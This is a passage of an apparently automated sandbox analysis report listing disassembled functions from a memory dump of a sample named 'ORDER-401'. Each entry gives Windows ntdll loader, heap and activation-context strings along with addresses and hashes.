                                                                    Function 0153645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01599A2A
                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 01599A11, 01599A3A
                                                                    • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01599A01
                                                                    • apphelp.dll, xrefs: 01536496
                                                                    • LdrpInitShimEngine, xrefs: 015999F4, 01599A07, 01599A30
                                                                    • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 015999ED
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-204845295
                                                                    • Opcode ID: 502b9a89ca120a0aa5e2ae51520715a9367219173e3b79444c5ca1d6d82c6c41
                                                                    • Instruction ID: 030eb6b5b028b57000bdd35a900efc14b5b021d18f05791614515f181c14b94c
                                                                    • Opcode Fuzzy Hash: 502b9a89ca120a0aa5e2ae51520715a9367219173e3b79444c5ca1d6d82c6c41
                                                                    • Instruction Fuzzy Hash: 4851AF71608306AFEB21DB24DC51AAB77E8FBC4748F44091DE5859F290D7B4EA44CB93
                                                                    Function 01572674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • SXS: %s() passed the empty activation context, xrefs: 015B2165
                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 015B21BF
                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 015B2178
                                                                    • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 015B219F
                                                                    • RtlGetAssemblyStorageRoot, xrefs: 015B2160, 015B219A, 015B21BA
                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 015B2180
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                    • API String ID: 0-861424205
                                                                    • Opcode ID: a8849ae07ecc2065ffe402046712e71e085a0a65faf2a155aaef86a32c273cb4
                                                                    • Instruction ID: 17c059e7fe06f47b6ef831716507000c2531e4d0220ee7dcd9922c50f66c3e12
                                                                    • Opcode Fuzzy Hash: a8849ae07ecc2065ffe402046712e71e085a0a65faf2a155aaef86a32c273cb4
                                                                    • Instruction Fuzzy Hash: FA31EB36B402257BF711CA959C86F9EBAB9FBA5A50F054059F604AF141D270AA01C6B1
                                                                    Function 0157C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • LdrpInitializeImportRedirection, xrefs: 015B8177, 015B81EB
                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 0157C6C3
                                                                    • LdrpInitializeProcess, xrefs: 0157C6C4
                                                                    • Unable to build import redirection Table, Status = 0x%x, xrefs: 015B81E5
                                                                    • Loading import redirection DLL: '%wZ', xrefs: 015B8170
                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 015B8181, 015B81F5
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                    • API String ID: 0-475462383
                                                                    • Opcode ID: 2f5051566b42709d0e4ae49a819df7791e2131c6aa3567956837ddc63e54e26c
                                                                    • Instruction ID: b77588383a69dfdd61586abdc13deba848824af1a2e6700a821347bb955fa885
                                                                    • Opcode Fuzzy Hash: 2f5051566b42709d0e4ae49a819df7791e2131c6aa3567956837ddc63e54e26c
                                                                    • Instruction Fuzzy Hash: 7D31C071644713ABD224EA68DD86E6AB7A8FFD5A10F040518F945AF291E660EC04C7A2
                                                                    Function 0158096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 01582DF0: LdrInitializeThunk.NTDLL ref: 01582DFA
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01580BA3
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01580BB6
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01580D60
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01580D74
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 1404860816-0
                                                                    • Opcode ID: 9eba31408ce84d6b41a5fe1dad4238d756ff784333349b0f3e994665a1002baf
                                                                    • Instruction ID: d63422705538a069b6dc6b52a29719287bcb96083a11a9ac89431355f1c44f92
                                                                    • Opcode Fuzzy Hash: 9eba31408ce84d6b41a5fe1dad4238d756ff784333349b0f3e994665a1002baf
                                                                    • Instruction Fuzzy Hash: E9426BB1900716DFDB61DF28C880BAABBF4BF44314F1445A9E989EB281D770A985CF60
                                                                    Function 0154A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                    • API String ID: 0-379654539
                                                                    • Opcode ID: c82e5e1a1022c85d22e2fdc03c9f439f92b9e463c43976d90e33dda2dc0177ee
                                                                    • Instruction ID: 5726c4c9ee12a8cc55e42775e5d2d08ab17f66892dfca45fe34c8260faa78892
                                                                    • Opcode Fuzzy Hash: c82e5e1a1022c85d22e2fdc03c9f439f92b9e463c43976d90e33dda2dc0177ee
                                                                    • Instruction Fuzzy Hash: 37C189755483828FD761CF58C144BAEB7E4FF84708F04896AF9968F251E734C949CBA2
                                                                    Function 01578402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 01578421
                                                                    • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0157855E
                                                                    • LdrpInitializeProcess, xrefs: 01578422
                                                                    • @, xrefs: 01578591
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-1918872054
                                                                    • Opcode ID: 5e45a2f160e5f7d5ef71c8979c97c7afe3a916dadbb0ab5d95d916f11ce6034c
                                                                    • Instruction ID: 18c8193df96355495370e920e45161e9d32dc85d72712858e268e7ff0be21f18
                                                                    • Opcode Fuzzy Hash: 5e45a2f160e5f7d5ef71c8979c97c7afe3a916dadbb0ab5d95d916f11ce6034c
                                                                    • Instruction Fuzzy Hash: 53918D71518346AFD722EF25DC85EAFBAECBF84744F40092EFA849A151E770D904CB62
                                                                    Function 0157273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 015B22B6
                                                                    • SXS: %s() passed the empty activation context, xrefs: 015B21DE
                                                                    • .Local, xrefs: 015728D8
                                                                    • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 015B21D9, 015B22B1
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                    • API String ID: 0-1239276146
                                                                    • Opcode ID: 8e3ee07f1c0ef8a128cffe86f44ce96ea406bba8ccc01fd5cfe72b4b8c6a7f13
                                                                    • Instruction ID: 4311ae125caa61290cfb46ea28f2e1cf6d5fed055097439f4508369f73c1a9b3
                                                                    • Opcode Fuzzy Hash: 8e3ee07f1c0ef8a128cffe86f44ce96ea406bba8ccc01fd5cfe72b4b8c6a7f13
                                                                    • Instruction Fuzzy Hash: C1A1AE3190022ADBDB25CF68DC85BA9B7B5BF58354F1845EAD908AF251D730AEC1CF90
                                                                    Function 01574AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • RtlDeactivateActivationContext, xrefs: 015B3425, 015B3432, 015B3451
                                                                    • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 015B3437
                                                                    • SXS: %s() called with invalid flags 0x%08lx, xrefs: 015B342A
                                                                    • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 015B3456
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                    • API String ID: 0-1245972979
                                                                    • Opcode ID: 35c95d9f277b70044df0756e10252e82fe985d50c6442a6bdc9eaeeb58ec2547
                                                                    • Instruction ID: 2522e5502fb16e87560258b0a9c02d18e5a6c30b852369138f31896b5a76f4a2
                                                                    • Opcode Fuzzy Hash: 35c95d9f277b70044df0756e10252e82fe985d50c6442a6bdc9eaeeb58ec2547
                                                                    • Instruction Fuzzy Hash: 976101366107129FDB22CF1DD886B7AB7E5BF80B50F148569E959AF280D734E801CB91
                                                                    Function 015464AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 015A1028
                                                                    • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 015A10AE
                                                                    • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 015A0FE5
                                                                    • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 015A106B
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                    • API String ID: 0-1468400865
                                                                    • Opcode ID: d3f5b70d2355a820515f960c872a76dbe7e04647d968b25f89e8b5a5328e526c
                                                                    • Instruction ID: 20c53bf2572d9b1dcc324f570d2828c4bc26ba18c069c5cde4a004cafcd16ae0
                                                                    • Opcode Fuzzy Hash: d3f5b70d2355a820515f960c872a76dbe7e04647d968b25f89e8b5a5328e526c
                                                                    • Instruction Fuzzy Hash: B871E2B19043469FCB21EF54C884B9B7FA8BF96768F800469F9488F186D334D589CBD2
                                                                    Function 01574D1D Relevance: 5.1, Strings: 4, Instructions: 117COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • minkernel\ntdll\ldrsnap.c, xrefs: 015B3640, 015B366C
                                                                    • LdrpFindDllActivationContext, xrefs: 015B3636, 015B3662
                                                                    • Querying the active activation context failed with status 0x%08lx, xrefs: 015B365C
                                                                    • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 015B362F
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                    • API String ID: 0-3779518884
                                                                    • Opcode ID: 8debbf77c707fd232793d1dc2f5d9390014a434e0a9845a2d417c77dbc479f4e
                                                                    • Instruction ID: df47074f35b863c7fe4222aed1342c5ff403e3c889485efa2e54c0e0b153d25c
                                                                    • Opcode Fuzzy Hash: 8debbf77c707fd232793d1dc2f5d9390014a434e0a9845a2d417c77dbc479f4e
                                                                    • Instruction Fuzzy Hash: C0312E32900251AEEF339B4DEC8FB7EB6A4FB01754F06402AD5856F251D7A0AC8087D5
                                                                    Function 0156245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 015AA9A2
                                                                    • apphelp.dll, xrefs: 01562462
                                                                    • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 015AA992
                                                                    • LdrpDynamicShimModule, xrefs: 015AA998
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-176724104
                                                                    • Opcode ID: d5464c4865b62886aeb60fd109d270d548f853b8e000f44d593f5969e53bf81e
                                                                    • Instruction ID: c8887eb3b3c8598d7afe28ba3ab485ef5b3f73a2acaddcfd3ca6895cfc59d9d1
                                                                    • Opcode Fuzzy Hash: d5464c4865b62886aeb60fd109d270d548f853b8e000f44d593f5969e53bf81e
                                                                    • Instruction Fuzzy Hash: F4316472A40202EFEB319F6DDC85AAE7BF8FBC4B00F560419E9016F245C7B09991CB90
                                                                    Function 015529A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • HEAP: , xrefs: 01553264
                                                                    • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0155327D
                                                                    • HEAP[%wZ]: , xrefs: 01553255
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                    • API String ID: 0-617086771
                                                                    • Opcode ID: ee9b4d7080eea9c1afde1521b2502d17b6ea839c5af0415f82e3fb4ffcace08c
                                                                    • Instruction ID: 878ea3dc279eb22acb3c1d29a19040ecdd15c8b858999b1ec4fcb7bc45c859a9
                                                                    • Opcode Fuzzy Hash: ee9b4d7080eea9c1afde1521b2502d17b6ea839c5af0415f82e3fb4ffcace08c
                                                                    • Instruction Fuzzy Hash: 1192AA71A04249DFDBA5CFA8C4547AEBBF1BF48310F18849AE85AAF252D734A941CF50
                                                                    Function 01550770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                    • API String ID: 0-4253913091
                                                                    • Opcode ID: 277cd2516a771e370acfca62ac0187b6b19f44bbf0582a3a3c7e7f18c50910f2
                                                                    • Instruction ID: 045c3c96122bb314af9e15e1f4d72a3fcd6aea491ec74cad9fbcc7537f0c54fe
                                                                    • Opcode Fuzzy Hash: 277cd2516a771e370acfca62ac0187b6b19f44bbf0582a3a3c7e7f18c50910f2
                                                                    • Instruction Fuzzy Hash: BCF17830A00606DFEB55CF68C8A4F6EBBF5FF84304F14856AE9569F285D734A981CB90
                                                                    Function 01566962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $@
                                                                    • API String ID: 0-1077428164
                                                                    • Opcode ID: 67527af1d9431495a67d0290f137c80665348ea72d9b8b808103ea9636656ea9
                                                                    • Instruction ID: 7b9e3002842a59b800c9e85969759fd15e6585a9d8f41fb4d600062c67db07ca
                                                                    • Opcode Fuzzy Hash: 67527af1d9431495a67d0290f137c80665348ea72d9b8b808103ea9636656ea9
                                                                    • Instruction Fuzzy Hash: 8CC25F716083419FE725CF28C841BAFBBE9BFC8754F04892DE9998B251D734D845CB92
                                                                    Function 0153A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: FilterFullPath$UseFilter$\??\
                                                                    • API String ID: 0-2779062949
                                                                    • Opcode ID: 1a1005b30ed844653a2aed16292758225c191bbd95f100955d101d0840a10414
                                                                    • Instruction ID: f43663b393d2e164a212510b5b1a7d9416fe0f428d7c20f804279a76c990453d
                                                                    • Opcode Fuzzy Hash: 1a1005b30ed844653a2aed16292758225c191bbd95f100955d101d0840a10414
                                                                    • Instruction Fuzzy Hash: C8A13C7191162A9BDF21DF68CC88BADB7B8FF44710F1041E9E909AB250E7359E84CF51
                                                                    Function 01560BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • Failed to allocated memory for shimmed module list, xrefs: 015AA10F
                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 015AA121
                                                                    • LdrpCheckModule, xrefs: 015AA117
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-161242083
                                                                    • Opcode ID: 88483e9bb43e74947a0a2d6c31c490c3c8bbd81cff3f7798eab5bc73df0145ad
                                                                    • Instruction ID: 40aedf194cb1d57f2c0650630fbaf5941697e30320738ea57635ee6b980d39f1
                                                                    • Opcode Fuzzy Hash: 88483e9bb43e74947a0a2d6c31c490c3c8bbd81cff3f7798eab5bc73df0145ad
                                                                    • Instruction Fuzzy Hash: 2B71B171A40206DFEB25DF68CD85ABEB7F4FB84304F14446DE802AF295D734AA51CB90
                                                                    Function 01550A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                    • API String ID: 0-1334570610
                                                                    • Opcode ID: a4f046447f6836853426980de81512346fc465363d49ba59a5ee2e115527676e
                                                                    • Instruction ID: bf37109077aa64c9b7abd07960851fdac0568dcb89bae45707aa73d2276a5228
                                                                    • Opcode Fuzzy Hash: a4f046447f6836853426980de81512346fc465363d49ba59a5ee2e115527676e
                                                                    • Instruction Fuzzy Hash: 2161B071610306DFDB69CF28C890B6EBBE1FF84714F14855AE8558F292E7B0E881CB91
                                                                    Function 0157C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 015B82E8
                                                                    • Failed to reallocate the system dirs string !, xrefs: 015B82D7
                                                                    • LdrpInitializePerUserWindowsDirectory, xrefs: 015B82DE
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-1783798831
                                                                    • Opcode ID: c509dd60eb2b2d349cbcf0483a58b8850524d619603459bc93bc6c57a8311614
                                                                    • Instruction ID: 26142108df7a7475144ea11b7240c3f4316ac06df722717dfe8d4c906e8f99a8
                                                                    • Opcode Fuzzy Hash: c509dd60eb2b2d349cbcf0483a58b8850524d619603459bc93bc6c57a8311614
                                                                    • Instruction Fuzzy Hash: 3B41E171514312ABD721EB68ED81B5FB7E8BF85750F00592EF949DB290EB70D8108B92
                                                                    Function 015FC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 015FC1C5
                                                                    • PreferredUILanguages, xrefs: 015FC212
                                                                    • @, xrefs: 015FC1F1
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                    • API String ID: 0-2968386058
                                                                    • Opcode ID: 39c07908eadb88f0a7e1b65048062f235c8a10491df92c022dd828a89fb23707
                                                                    • Instruction ID: de939b9937e6baa7f8ab359294f6f2f85221de5207e794cb147635a90f3f9fce
                                                                    • Opcode Fuzzy Hash: 39c07908eadb88f0a7e1b65048062f235c8a10491df92c022dd828a89fb23707
                                                                    • Instruction Fuzzy Hash: E6416176E1020EABDB11DAD8C851FEEBBB8FB54700F14407AEB49BB240D7749A44CB50
                                                                    Function 015D4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                    • API String ID: 0-1373925480
                                                                    • Opcode ID: bd08e22c98ac400a8149509e72f5d69f6e78a31d568f00fb6a8abdd329fab9e0
                                                                    • Instruction ID: 977cc9ed87e880430b609546555458adc1fcf701165d64389a20950de14d9f28
                                                                    • Opcode Fuzzy Hash: bd08e22c98ac400a8149509e72f5d69f6e78a31d568f00fb6a8abdd329fab9e0
                                                                    • Instruction Fuzzy Hash: 8541BF32A0065A8BEB26DBE9C844BADBBF9FF95340F14045AD901EFB91D7348901CB51
                                                                    Function 015C4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 015C4888
                                                                    • LdrpCheckRedirection, xrefs: 015C488F
                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 015C4899
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                    • API String ID: 0-3154609507
                                                                    • Opcode ID: 6d33d0efe026e6239ece371387de33938f401fdcc732a09528ad1af0f92e6e08
                                                                    • Instruction ID: 87ceb03166be66a947fae14f884e54c64e25f96691760dcdc769cbfa58d18d9f
                                                                    • Opcode Fuzzy Hash: 6d33d0efe026e6239ece371387de33938f401fdcc732a09528ad1af0f92e6e08
                                                                    • Instruction Fuzzy Hash: 27419E32A046519FDB22CEACD860E2B7BE4FF89E50B05056DED499F216D730D811CB91
                                                                    Function 01550BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                    • API String ID: 0-2558761708
                                                                    • Opcode ID: 3f39d3fc2d471e5778e8c3d79599e9e5157beb724d094606174d5b66de499fc0
                                                                    • Instruction ID: 9196e2a842b325e031c5704fab27f793cf62baa4d690a95e51158de4b7414155
                                                                    • Opcode Fuzzy Hash: 3f39d3fc2d471e5778e8c3d79599e9e5157beb724d094606174d5b66de499fc0
